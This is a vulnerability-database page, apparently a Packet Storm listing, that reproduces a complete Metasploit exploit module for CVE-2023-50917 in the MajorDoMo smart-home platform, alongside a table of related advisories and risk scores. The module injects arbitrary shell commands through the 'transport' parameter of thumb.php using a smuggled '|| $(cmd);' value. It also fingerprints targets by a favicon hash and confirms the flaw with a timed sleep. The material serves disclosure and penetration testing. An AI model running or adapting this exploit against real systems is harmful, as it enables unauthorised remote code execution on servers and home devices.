MajorDoMo Command Injection

🗓️ 22 Jan 2024 00:00:00Reported by Valentin Lobstein, smcintyre-r7, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 272 Views

Exploits MajorDoMo Command Injection with metasploit

Reporter	Title	Published	Views	Family All 18
0day.today	MajorDoMo Remote Code Execution Vulnerability	20 Dec 202300:00	–	zdt
0day.today	MajorDoMo Command Injection Exploit	22 Jan 202400:00	–	zdt
ATTACKERKB	CVE-2023-50917	15 Dec 202317:15	–	attackerkb
BDU FSTEC	The vulnerability of the implementation of the thumb.php script module on the thumb platform for creating the “Smart Home” MajorDoMo system allows a violator to execute arbitrary commands.	25 Dec 202300:00	–	bdu_fstec
Circl	CVE-2023-50917	18 Dec 202301:20	–	circl
CNNVD	MajorDoMo 安全漏洞	15 Dec 202300:00	–	cnnvd
CNVD	MajorDoMo Command Execution Vulnerability (CNVD-2024-0217529)	19 Dec 202300:00	–	cnvd
CVE	CVE-2023-50917	15 Dec 202300:00	–	cve
Cvelist	CVE-2023-50917	15 Dec 202300:00	–	cvelist
GithubExploit	Exploit for Command Injection in Mjdm Majordomo	29 Oct 202305:10	–	githubexploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'MajorDoMo Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in MajorDoMo  
versions before 0662e5e.  
},  
'Author' => [  
'Valentin Lobstein', # Vulnerability discovery and Metasploit Module  
'smcintyre-r7', # Assistance  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2023-50917'],  
['URL', 'https://github.com/Chocapikk/CVE-2023-50917'],  
['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'],  
['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL  
],  
'DisclosureDate' => '2023-12-15',  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [ IOC_IN_LOGS ],  
'Reliability' => [ REPEATABLE_SESSION ]  
},  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD],  
'Targets' => [['Automatic', {}]],  
'Privileged' => false  
)  
)  
  
register_options([  
Opt::RPORT(80),  
OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']),  
])  
end  
  
def execute_command(cmd)  
send_request_cgi(  
'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'),  
'method' => 'GET',  
'vars_get' => {  
'url' => Rex::Text.encode_base64('rtsp://'),  
'debug' => '1',  
'transport' => "|| $(#{cmd});"  
}  
)  
end  
  
def exploit  
execute_command(payload.encoded)  
end  
  
def check  
print_status("Checking if #{peer} can be exploited!")  
res = send_request_cgi(  
'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'),  
'method' => 'GET'  
)  
  
unless res && res.code == 200  
return CheckCode::Unknown('Did not receive a response from target.')  
end  
  
unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'  
return CheckCode::Safe('The target is not MajorDoMo.')  
end  
  
print_good('Target is identified as MajorDoMo instance')  
sleep_time = rand(5..10)  
print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")  
res, elapsed_time = Rex::Stopwatch.elapsed_time do  
execute_command("sleep #{sleep_time}")  
end  
print_status("Elapsed time: #{elapsed_time} seconds.")  
unless res && elapsed_time >= sleep_time  
return CheckCode::Safe('Failed to test command injection.')  
end  
  
CheckCode::Vulnerable('Successfully tested command injection.')  
end  
end  
`

22 Jan 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.92637